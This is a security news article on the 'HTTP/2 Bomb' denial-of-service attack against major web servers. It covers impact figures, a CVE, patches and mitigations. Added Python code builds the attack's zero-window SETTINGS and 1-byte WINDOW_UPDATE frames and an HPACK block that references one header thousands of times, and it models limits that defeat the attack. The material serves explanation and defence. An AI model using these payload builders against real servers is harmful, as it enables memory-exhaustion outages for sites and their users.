A newly disclosed remote denial-of-service (DoS) exploit, termed the “HTTP/2 Bomb,” has been identified as a significant threat to widely used web servers, including nginx, Apache httpd, Microsoft IIS, Envoy, and Cloudflare Pingora. This exploit enables a single attacker to rapidly exhaust tens of gigabytes of server memory, potentially leading to severe service disruptions.
Understanding the HTTP/2 Bomb Exploit
The HTTP/2 Bomb combines two known techniques: an HPACK compression bomb and a Slowloris-style connection hold. HPACK, defined in RFC 7541, is HTTP/2’s header compression scheme. It keeps a dynamic table of recently sent headers so that a later header can be transmitted as a short index instead of its full name and value. The exploit inserts one header into that table and then references it thousands of times within a single request. Each reference is a single byte on the wire but decodes to the complete header, so the server allocates memory for every reference; how much depends on the implementation. nginx, IIS, and Pingora allocate roughly 70 bytes per reference, while Apache httpd and Envoy allocate up to about 4,000 bytes.
The second component targets HTTP/2’s per-stream flow control, defined in RFC 9113. The attacker advertises a zero-byte flow-control window, so the server can prepare its response but is never permitted to send it. A continuous trickle of 1-byte WINDOW_UPDATE frames then resets the server’s send timeout each time one arrives, so the memory allocated for the decoded headers and the pending response stays held for as long as the attacker keeps sending, rather than being freed when the request completes. That hold is what turns a one-off allocation into sustained exhaustion.
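The flow-control hold described above, as an added example that is not part of the article or of any server’s code. The Python below builds the two client frames involved (RFC 9113 §4.1 frame header, §6.5 SETTINGS, §6.9 WINDOW_UPDATE) and runs a simulated clock over one stream under two server timeout policies: the one the attack relies on, where any WINDOW_UPDATE resets the send timeout, and a sketch of an alternative, where the timer is extended only if the client has actually accepted a minimum number of bytes per second. The `min_rate` policy and the numbers used are assumptions for illustration, not the behaviour of any server named in the article.

```python
# Model of the Slowloris-style hold used by the HTTP/2 Bomb: the client opens
# with SETTINGS_INITIAL_WINDOW_SIZE = 0, so the server can buffer a response
# but never send it, then sends a 1-byte WINDOW_UPDATE just often enough to
# stay inside the server's send timeout.  Added illustration with a simulated
# clock; the timeout policies below are a sketch, not the actual logic of any
# server named in the article.  Frame layouts follow RFC 9113 §4.1 (frame
# header), §6.5 (SETTINGS) and §6.9 (WINDOW_UPDATE).
import struct

TYPE_SETTINGS, TYPE_WINDOW_UPDATE = 0x4, 0x8
SETTINGS_INITIAL_WINDOW_SIZE = 0x4


def frame(ftype, flags, stream_id, payload):
    """9-byte frame header: 24-bit length, type, flags, 31-bit stream id."""
    return (struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def parse_frame(buf):
    """Inverse of frame(): (type, flags, stream_id, payload)."""
    length = int.from_bytes(buf[0:3], "big")
    stream_id = struct.unpack(">I", buf[5:9])[0] & 0x7FFFFFFF
    return buf[3], buf[4], stream_id, buf[9:9 + length]


def settings_zero_window():
    """Client's opening SETTINGS: every new stream starts with a 0-byte window."""
    return frame(TYPE_SETTINGS, 0, 0, struct.pack(">HI", SETTINGS_INITIAL_WINDOW_SIZE, 0))


def window_update(stream_id, increment=1):
    """Grant `increment` bytes of credit on one stream (31-bit value, RFC 9113 §6.9)."""
    return frame(TYPE_WINDOW_UPDATE, 0, stream_id, struct.pack(">I", increment & 0x7FFFFFFF))


def hold_duration(response_bytes, send_timeout, update_interval, increment=1,
                  min_rate=None, horizon=3600.0):
    """Simulated server view of one stream whose client sends a WINDOW_UPDATE
    of `increment` bytes every `update_interval` seconds.

    min_rate=None: any WINDOW_UPDATE resets the send timeout (the behaviour the
    attack relies on).  min_rate=N (assumed policy): the timer is extended only
    if at least N bytes/second were actually delivered in the last window.

    Returns the simulated time at which the server releases the stream, or
    None if it is still holding the stream's memory when `horizon` is reached.
    """
    t, window, remaining, delivered = 0.0, 0, response_bytes, 0
    deadline = send_timeout
    while remaining > 0:
        t += update_interval                   # next WINDOW_UPDATE arrives
        while t > deadline:                    # timer expired before it got here
            if min_rate is None or delivered / send_timeout < min_rate:
                return deadline                # stream reset, memory released
            delivered, deadline = 0, deadline + send_timeout   # enough progress
        if t > horizon:
            return None                        # still held when we stop looking
        window += increment
        sent = min(window, remaining)          # DATA the new credit lets out
        window -= sent
        remaining -= sent
        delivered += sent
        if min_rate is None:
            deadline = t + send_timeout        # vulnerable: credit == progress
    return t                                   # response fully sent


if __name__ == "__main__":
    print("client opening SETTINGS:", settings_zero_window().hex())
    print("1-byte WINDOW_UPDATE on stream 1:", window_update(1).hex())
    print("reset-on-any-update, 1 byte every 30 s:",
          hold_duration(1_000_000, send_timeout=60, update_interval=30))
    print("min 1 KiB/s required, same trickle:",
          hold_duration(1_000_000, 60, 30, min_rate=1024))
    print("min 1 KiB/s, normal client:",
          hold_duration(1_000_000, 60, 1, increment=65535, min_rate=1024))
```

With the reset-on-any-update policy the 1-byte trickle keeps a 1 MB response (and everything allocated alongside it) resident for the whole simulated hour; the rate-based sketch releases the stream at the first 60-second deadline, while a client that drains 64 KiB per second completes normally.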
Impact on Web Servers
The impact differs by server. Envoy 1.37.2 showed a memory amplification ratio of roughly 5,700:1, reaching 32 GB of memory consumption in about 10 seconds. Apache httpd 2.4.67 showed around 4,000:1, reaching 32 GB in 18 seconds. Nginx 1.29.7 (about 70:1) reached 32 GB and Microsoft IIS on Windows Server 2025 (about 68:1) reached 64 GB, each in about 45 seconds.
A Shodan analysis identified over 880,000 public-facing websites supporting HTTP/2 and running one of these servers. While many are protected by Content Delivery Networks (CDNs), reducing direct exposure, the risk remains significant.
For servers that cap the number of header fields rather than the decoded size, such as Apache httpd and Envoy, the exploit uses a Cookie header bypass. RFC 9113 §8.2.3 allows a sender to split the Cookie header into multiple cookie fields so that they compress better, and these servers do not count the resulting fields against their field limit. A request made of split cookie fields therefore passes the existing check while still decoding to the full amplified size. The limit that actually bounds the attack is one that counts every decoded field, or caps the decoded size of the header list, rather than one the split cookies can slip past.
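The HPACK amplification described earlier and the field-count limit that split Cookie fields slip past, in one added example. This is illustration code written for this page, not the article’s code and not the code of any server it names. It implements just enough of RFC 7541 (integers, raw string literals, the “literal with incremental indexing” and “indexed header field” representations; no Huffman coding and no static table) to build the header block the article describes and to decode it under either limit policy. The `exempt_cookie` option is a stand-in for the allowance the article says Apache httpd and Envoy applied, not their actual logic, and the sizes and limits are chosen for illustration.

```python
# Minimal HPACK (RFC 7541) encoder/decoder covering only the two
# representations the HTTP/2 Bomb relies on.  Added illustration for this
# page; not code from the article or from any of the servers it names.
# No Huffman coding and no static table: the one referenced entry lives in
# the dynamic table, which is all the amplification needs.

STATIC_TABLE_SIZE = 61   # RFC 7541 Appendix A; first dynamic index is 62
ENTRY_OVERHEAD = 32      # RFC 7541 §4.1: entry size = len(name) + len(value) + 32


def encode_int(value, prefix_bits, flags):
    """RFC 7541 §5.1: integer in an N-bit prefix, then 7-bit continuation bytes."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 0x80:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def decode_int(buf, pos, prefix_bits):
    """Inverse of encode_int(): returns (value, new_pos)."""
    limit = (1 << prefix_bits) - 1
    value, pos = buf[pos] & limit, pos + 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def encode_string(s):
    """String literal with H = 0 (raw octets, no Huffman coding)."""
    return encode_int(len(s), 7, 0x00) + s


def decode_string(buf, pos):
    if buf[pos] & 0x80:
        raise ValueError("Huffman-coded string; not modelled in this example")
    length, pos = decode_int(buf, pos, 7)
    return buf[pos:pos + length], pos + length


def bomb_header_block(name, value, references):
    """One 'literal with incremental indexing' (0x40, new name) that inserts
    (name, value) at dynamic index 62, then `references` single bytes
    (0x80 | 62) that each decode to that whole entry."""
    block = bytearray(b"\x40" + encode_string(name) + encode_string(value))
    block += encode_int(STATIC_TABLE_SIZE + 1, 7, 0x80) * references
    return bytes(block)


def decode_header_block(block, max_fields=None, exempt_cookie=False,
                        max_decoded_bytes=None):
    """Decode to a header list, enforcing either limit style.
    max_fields counts fields; exempt_cookie=True leaves 'cookie' fields out of
    that count (stand-in for the RFC 9113 §8.2.3 split-cookie allowance).
    max_decoded_bytes bounds the decoded list size in RFC 7541 §4.1 units,
    which is the quantity the bomb inflates."""
    dynamic = []          # newest first, so index 62 -> dynamic[0]
    headers, fields, decoded, pos = [], 0, 0, 0
    while pos < len(block):
        first = block[pos]
        if first & 0x80:                              # indexed header field
            index, pos = decode_int(block, pos, 7)
            if index <= STATIC_TABLE_SIZE:
                raise ValueError("static-table index; not modelled here")
            name, value = dynamic[index - STATIC_TABLE_SIZE - 1]
        elif first & 0x40:                            # literal, incremental indexing
            name_index, pos = decode_int(block, pos, 6)
            if name_index:
                raise ValueError("indexed name; not modelled here")
            name, pos = decode_string(block, pos)
            value, pos = decode_string(block, pos)
            dynamic.insert(0, (name, value))
        else:
            raise ValueError("representation not modelled here")
        headers.append((name, value))
        decoded += len(name) + len(value) + ENTRY_OVERHEAD
        if max_decoded_bytes is not None and decoded > max_decoded_bytes:
            raise ValueError("decoded header list exceeds %d bytes" % max_decoded_bytes)
        if not (exempt_cookie and name == b"cookie"):
            fields += 1
        if max_fields is not None and fields > max_fields:
            raise ValueError("more than %d header fields" % max_fields)
    return headers


def amplification(name, value, references):
    """(wire_bytes, decoded_bytes, ratio) for one bomb block, no limits applied."""
    block = bomb_header_block(name, value, references)
    decoded = sum(len(n) + len(v) + ENTRY_OVERHEAD
                  for n, v in decode_header_block(block))
    return len(block), decoded, decoded / len(block)
```

For a 100-byte cookie referenced 10,000 times, `amplification(b"cookie", b"a" * 100, 10_000)` gives 10,109 bytes on the wire and 1,380,138 bytes decoded, about 137:1 in this toy accounting (the per-server figures in the article depend on what each implementation allocates per decoded field). Decoding the same block with `max_fields=1000, exempt_cookie=True` accepts all 10,001 fields, while `max_fields=1000` without the exemption, or `max_decoded_bytes=65536`, raises `ValueError` early.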
Following responsible disclosure on May 27, 2026, Apache httpd assigned CVE-2026-49975 to this vulnerability and promptly committed a fix. Nginx addressed the issue in version 1.29.8 by introducing the ‘max_headers’ directive with a default limit of 1,000 headers.
Given how widely HTTP/2 and the affected servers are deployed, this exploit underscores the need for prompt patching. Administrators should update to the fixed releases named above and, where a server exposes a limit on the number of request headers, confirm that it is enabled rather than left at an unbounded setting.
Source: Cyber Security News